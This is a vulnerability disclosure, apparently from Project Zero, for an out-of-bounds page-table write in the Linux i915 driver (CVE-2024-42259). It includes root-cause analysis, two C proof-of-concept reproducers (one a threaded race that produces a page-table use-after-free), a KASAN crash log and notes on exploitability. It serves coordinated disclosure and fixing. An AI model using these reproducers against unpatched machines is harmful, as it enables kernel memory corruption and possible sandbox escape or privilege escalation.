I found a bug in the i915 code that allows a process with access to a render
node (/dev/dri/renderD128) to corrupt kernel memory.
This bug is subject to a 90-day disclosure deadline. If a fix for this
issue is made available to users before the end of the 90-day deadline,
this bug report will become public 30 days after the fix was made
available. Otherwise, this bug report will become public at the deadline.
The scheduled deadline is 2024-08-28.
Summary
vm_fault_gtt() calls remap_io_mapping with an incorrect size; it should limit
the size to area->vm_end - {address passed to remap_io_mapping} instead of
area->vm_end - area->vm_start.
Bug description
[For people reading this bug report who are not i915 experts: I highly recommend
first reading sima's "i915/GEM Crashcourse" at
https://blog.ffwll.ch/2013/01/i915gem-crashcourse-overview.html. I wouldn't
have understood what's going on in this code without reading that.]
I found a bug in vm_fault_gtt() in drivers/gpu/drm/i915/gem/i915_gem_mman.c.
PTEs pointing into the GTT MMIO window are written as follows:
/\* Now pin it into the GTT as needed \*/
vma = i915_gem_object_ggtt_pin_ww(obj, &ww, NULL, 0, 0,
PIN_MAPPABLE |
PIN_NONBLOCK /\* NOWARN \*/ |
PIN_NOEVICT);
if (IS_ERR(vma) && vma != ERR_PTR(-EDEADLK)) {
/\* Use a partial view if it is bigger than available space \*/
struct i915_gtt_view view =
compute_partial_view(obj, page_offset, MIN_CHUNK_PAGES);
[...]
vma = i915_gem_object_ggtt_pin_ww(obj, &ww, &view, 0, 0, flags);
[...]
}
[...]
/\* Finally, remap it using the new GTT offset \*/
ret = remap_io_mapping(area,
area->vm_start + (vma->gtt_view.partial.offset << PAGE_SHIFT),
(ggtt->gmadr.start + i915_ggtt_offset(vma)) >> PAGE_SHIFT,
min_t(u64, vma->size, area->vm_end - area->vm_start),
&ggtt->iomap);
In the case where the first i915_gem_object_ggtt_pin_ww() call refuses to
map the whole object into the GTT MMIO window, for example because the
object is too big to fit into the window, a subrange of the object is mapped
instead. When this happens and the subrange is not at the start of the VMA,
vma->gtt_view.partial.offset is nonzero.
In this case, the size parameter passed to remap_io_mapping() is calculated
wrong: It is limited to the size of the VMA (area->vm_end - area->vm_start),
but with an address that is higher than where the VMA starts
(area->vm_start + (vma->gtt_view.partial.offset << PAGE_SHIFT)), so the
end address is only limited to
area->vm_end + (vma->gtt_view.partial.offset << PAGE_SHIFT).
When the VMA covers the whole object, this has no bad consequences because of
the min_t(); but if the VMA is shorter than the object, PTEs can be written
out of bounds.
This can be tested with the following reproducer - on my system it causes
"BUG: Bad page map" and "Bug: Bad rss-counter" errors when the reproducer
tries to exit:
// written for a device with Xe Graphics (TGL GT2)
#define _GNU_SOURCE
#include <err.h>
#include <fcntl.h>
#include <stdio.h>
#include <inttypes.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <drm/i915_drm.h>
#define SYSCHK(x) ({ \
typeof(x) __res = (x); \
if (__res == (typeof(x))-1) \
err(1, "SYSCHK(" #x ")"); \
__res; \
})
#define MiB \*(1024\*1024)
void poke(volatile char \*p) {
printf("poking %p\n", p);
\*p = 1;
}
int main(void) {
int fd = SYSCHK(open("/dev/dri/renderD128", O_RDWR));
struct drm_i915_gem_create gem_create = {
.size = 257 MiB /\* a bit over half the GGTT aperture size on my machine \*/
};
SYSCHK(ioctl(fd, DRM_IOCTL_I915_GEM_CREATE, &gem_create));
printf("created GEM 0x%x\n", gem_create.handle);
struct drm_i915_gem_mmap_offset mmap_offset_arg = {
.handle = gem_create.handle,
.flags = I915_MMAP_OFFSET_GTT
};
SYSCHK(ioctl(fd, DRM_IOCTL_I915_GEM_MMAP_OFFSET, &mmap_offset_arg));
printf("fake mmap offset: 0x%lx\n", (unsigned long)mmap_offset_arg.offset);
#define MAP_SIZE (128 MiB - 0x80000)
volatile char \*map = (volatile char \*)SYSCHK(mmap(NULL, MAP_SIZE, PROT_READ|PROT_WRITE, MAP_SHARED, fd, mmap_offset_arg.offset));
printf("mapped from %p\n", map);
poke(map + MAP_SIZE - 0x1000);
poke(map);
printf("mapped to %p\n", map + MAP_SIZE);
}
Code history
The current form of the buggy code is from commit c58305af1835 ("drm/i915: Use
remap_io_mapping() to prefault all PTE in a single pass", landed in v4.9), but
I think back then it was unreachable because the code for constructing a partial
view limited the partial view's size based on the VMA bounds back then:
view.params.partial.size =
min_t(unsigned int, chunk_size,
(area->vm_end - area->vm_start) / PAGE_SIZE -
view.params.partial.offset);
This safety was removed in commit 8201c1fad4f4 ("drm/i915: Clip the partial
view against the object not vma", first in v4.11). I suspect the bug became
hittable after that point.
Most places in the kernel that install PFNMAP PTEs use helpers like
remap_pfn_range() that make sure the passed range fits into the specified VMA;
but it looks like i915 doesn't use those because it wants to be able to clobber
existing PTEs, which the usual helpers treat as an error.
(See commit 0e4fe0c9f2f9 ("Revert "i915: use io_mapping_map_user"").)
i915 instead uses its own helper remap_io_mapping(), which just writes PTEs
in the specified virtual address range.
Exploitability
One consequence of this bug is that, because PFNMAP PTEs are written outside the
region covered by the VMA, the MM subsystem can't shoot them down when the
driver wants to revoke userspace's access to the region. So this could probably
be used to gain access to memory that is later mapped into the GTT in the MMIO
window - but I don't know enough about i915 to tell whether that is bad or
whether shaders always have access to all GTT memory anyway.
Probably another consequence would be that if you had a VMA at the end of the
userspace virtual address space, you could get memory mapped into the kernel
half of memory? But that probably wouldn't lead to anything overly bad...
The one way I know of to turn this bug into something that is definitely bad
is to turn it into page table UAF, like in
https://crbug.com/project-zero/2350:
When you're only holding the mmap_lock in read mode (like in a page fault
handler), page tables that are not needed by any VMA can be freed concurrently.
So if we have one GTT-backed VMA directly ahead of a second VMA, and then
concurrently trigger a fault in the GTT-backed VMA while unmapping the second
VMA, the out-of-bounds page table access off of the first VMA can walk page
tables that are concurrently freed.
I tested this in a v6.9.2 kernel build with CONFIG_KASAN=y (for detecting UAF
access) and CONFIG_RCU_STRICT_GRACE_PERIOD=y (a debugging option that makes RCU
grace periods much shorter at the expense of performance, which makes it easier
to detect use-after-free bugs for objects that are RCU-freed), using the
following reproducer, running on a system with Xe Graphics (TGL GT2):
// written for a device with Xe Graphics (TGL GT2)
#define _GNU_SOURCE
#include <pthread.h>
#include <err.h>
#include <fcntl.h>
#include <stdio.h>
#include <inttypes.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <drm/i915_drm.h>
#define SYSCHK(x) ({ \
typeof(x) __res = (x); \
if (__res == (typeof(x))-1) \
err(1, "SYSCHK(" #x ")"); \
__res; \
})
#define MiB \*(1024\*1024)
// virtual address at the boundary between PGD entries
#define PGD_BOUNDARY_ADDR 0x8000000000
#define MAP_SIZE (128 MiB - 0x80000)
#define LEFT_MAPPING_ADDR (PGD_BOUNDARY_ADDR - MAP_SIZE)
#define FLIPPER_MAP_SIZE 0x200000
static void \*flipper_thread_fn(void \*dummy) {
int fd = SYSCHK(open("/dev/dri/renderD128", O_RDWR));
struct drm_i915_gem_create gem_create = {
.size = FLIPPER_MAP_SIZE
};
SYSCHK(ioctl(fd, DRM_IOCTL_I915_GEM_CREATE, &gem_create));
printf("flipper created GEM 0x%x\n", gem_create.handle);
struct drm_i915_gem_mmap_offset mmap_offset_arg = {
.handle = gem_create.handle,
.flags = I915_MMAP_OFFSET_GTT
};
SYSCHK(ioctl(fd, DRM_IOCTL_I915_GEM_MMAP_OFFSET, &mmap_offset_arg));
printf("flipper fake mmap offset: 0x%lx\n", (unsigned long)mmap_offset_arg.offset);
while (1) {
SYSCHK(mmap((void\*)PGD_BOUNDARY_ADDR, FLIPPER_MAP_SIZE, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED_NOREPLACE, fd, mmap_offset_arg.offset));
SYSCHK(munmap((void\*)PGD_BOUNDARY_ADDR, FLIPPER_MAP_SIZE));
}
return NULL;
}
int main(void) {
pthread_t flipper_thread;
if (pthread_create(&flipper_thread, NULL, flipper_thread_fn, NULL))
errx(1, "pthread_create");
int fd = SYSCHK(open("/dev/dri/renderD128", O_RDWR));
struct drm_i915_gem_create gem_create = {
.size = 257 MiB /\* a bit over half the GGTT aperture size on my machine \*/
};
SYSCHK(ioctl(fd, DRM_IOCTL_I915_GEM_CREATE, &gem_create));
printf("created GEM 0x%x\n", gem_create.handle);
struct drm_i915_gem_mmap_offset mmap_offset_arg = {
.handle = gem_create.handle,
.flags = I915_MMAP_OFFSET_GTT
};
SYSCHK(ioctl(fd, DRM_IOCTL_I915_GEM_MMAP_OFFSET, &mmap_offset_arg));
printf("fake mmap offset: 0x%lx\n", (unsigned long)mmap_offset_arg.offset);
while (1) {
SYSCHK(mmap((void\*)LEFT_MAPPING_ADDR, MAP_SIZE, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED_NOREPLACE, fd, mmap_offset_arg.offset));
\*(volatile char \*)(PGD_BOUNDARY_ADDR - 0x1000);
SYSCHK(munmap((void\*)LEFT_MAPPING_ADDR, MAP_SIZE));
}
}
With that, I quickly got a KASAN splat (guess unwind lines removed):
[ 906.394685] Huh VM_FAULT_OOM leaked out to the #PF handler. Retrying PF
[ 906.657887] Huh VM_FAULT_OOM leaked out to the #PF handler. Retrying PF
[ 906.819808] ==================================================================
[ 906.819819] BUG: KASAN: use-after-free in pmd_install (./arch/x86/include/asm/pgtable_types.h:401 ./arch/x86/include/asm/pgtable.h:1024 mm/memory.c:416)
[ 906.819827] Read of size 8 at addr ffff888180919000 by task linux-i915-oob-/3809
[ 906.819832] CPU: 3 PID: 3809 Comm: linux-i915-oob- Not tainted 6.9.2 #3
[ 906.819835] Hardware name: [...]
[ 906.819838] Call Trace:
[ 906.819839] <TASK>
[ 906.819841] dump_stack_lvl (lib/dump_stack.c:117 (discriminator 1))
[ 906.819847] print_report (mm/kasan/report.c:378 mm/kasan/report.c:488)
[ 906.819859] kasan_report (mm/kasan/report.c:603)
[ 906.819865] pmd_install (./arch/x86/include/asm/pgtable_types.h:401 ./arch/x86/include/asm/pgtable.h:1024 mm/memory.c:416)
[ 906.819869] __pte_alloc (mm/memory.c:445)
[ 906.819886] __apply_to_page_range (mm/memory.c:2728 mm/memory.c:2788 mm/memory.c:2824 mm/memory.c:2860 mm/memory.c:2894)
[ 906.819893] remap_io_mapping (drivers/gpu/drm/i915/i915_mm.c:110)
[ 906.819905] vm_fault_gtt (drivers/gpu/drm/i915/gem/i915_gem_mman.c:411)
[ 906.819924] __do_fault (mm/memory.c:4531)
[ 906.819927] do_fault (mm/memory.c:4894 mm/memory.c:5024)
[ 906.819931] __handle_mm_fault (mm/memory.c:3880 mm/memory.c:5300 mm/memory.c:5441)
[ 906.819948] handle_mm_fault (mm/memory.c:5466 mm/memory.c:5622)
[ 906.819951] do_user_addr_fault (arch/x86/mm/fault.c:1384)
[ 906.819959] exc_page_fault (./arch/x86/include/asm/irqflags.h:37 ./arch/x86/include/asm/irqflags.h:72 arch/x86/mm/fault.c:1482 arch/x86/mm/fault.c:1532)
[ 906.819963] asm_exc_page_fault (./arch/x86/include/asm/idtentry.h:623)
[ 906.819967] RIP: 0033:0x561a370af516
[ 906.819970] Code: 48 83 7d e8 ff 75 19 48 8d 05 26 0d 00 00 48 89 c6 bf 01 00 00 00 b8 00 00 00 00 e8 64 fb ff ff 48 b8 00 f0 ff ff 7f 00 00 00 <0f> b6 00 be 00 00 f8 07 48 b8 00 00 08 f8 7f 00 00 00 48 89 c7 e8
All code
========
0: 48 83 7d e8 ff cmpq $0xffffffffffffffff,-0x18(%rbp)
5: 75 19 jne 0x20
7: 48 8d 05 26 0d 00 00 lea 0xd26(%rip),%rax # 0xd34
e: 48 89 c6 mov %rax,%rsi
11: bf 01 00 00 00 mov $0x1,%edi
16: b8 00 00 00 00 mov $0x0,%eax
1b: e8 64 fb ff ff call 0xfffffffffffffb84
20: 48 b8 00 f0 ff ff 7f movabs $0x7ffffff000,%rax
27: 00 00 00
2a:\* 0f b6 00 movzbl (%rax),%eax <-- trapping instruction
2d: be 00 00 f8 07 mov $0x7f80000,%esi
32: 48 b8 00 00 08 f8 7f movabs $0x7ff8080000,%rax
39: 00 00 00
3c: 48 89 c7 mov %rax,%rdi
3f: e8 .byte 0xe8
Code starting with the faulting instruction
===========================================
0: 0f b6 00 movzbl (%rax),%eax
3: be 00 00 f8 07 mov $0x7f80000,%esi
8: 48 b8 00 00 08 f8 7f movabs $0x7ff8080000,%rax
f: 00 00 00
12: 48 89 c7 mov %rax,%rdi
15: e8 .byte 0xe8
[ 906.819973] RSP: 002b:00007ffdd0b75430 EFLAGS: 00010213
[ 906.819976] RAX: 0000007ffffff000 RBX: 00007ffdd0b755a8 RCX: 00007f8a3a3848a3
[ 906.819978] RDX: 0000000000000003 RSI: 0000000007f80000 RDI: 0000007ff8080000
[ 906.819980] RBP: 00007ffdd0b75490 R08: 0000000000000003 R09: 0000000135188000
[ 906.819982] R10: 0000000000100001 R11: 0000000000000246 R12: 0000000000000000
[ 906.819984] R13: 00007ffdd0b755b8 R14: 0000561a370b1dd8 R15: 00007f8a3a4b9020
[ 906.819987] </TASK>
[ 906.819990] The buggy address belongs to the physical page:
[ 906.819992] page: refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x180919
[ 906.819994] flags: 0x4000000000000000(zone=1)
[ 906.819997] page_type: 0xffffffff()
[ 906.820000] raw: 4000000000000000 ffffea0006024688 ffffea0006024788 0000000000000000
[ 906.820002] raw: 0000000000000000 0000000000000001 00000000ffffffff 0000000000000000
[ 906.820004] page dumped because: kasan: bad access detected
[ 906.820006] Memory state around the buggy address:
[ 906.820008] ffff888180918f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[ 906.820010] ffff888180918f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[ 906.820011] >ffff888180919000: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
[ 906.820013] ^
[ 906.820014] ffff888180919080: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
[ 906.820016] ffff888180919100: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
[ 906.820017] ==================================================================
This bug is probably not very interesting on Linux servers, since access to
the render node is typically only granted to UIDs who have locally signed in
to a machine; but it is probably relevant for things like ChromeOS, and maybe
also for escaping from some types of sandboxed desktop applications?
Related CVE Number: CVE-2024-42259.
Found by: jannh@google.com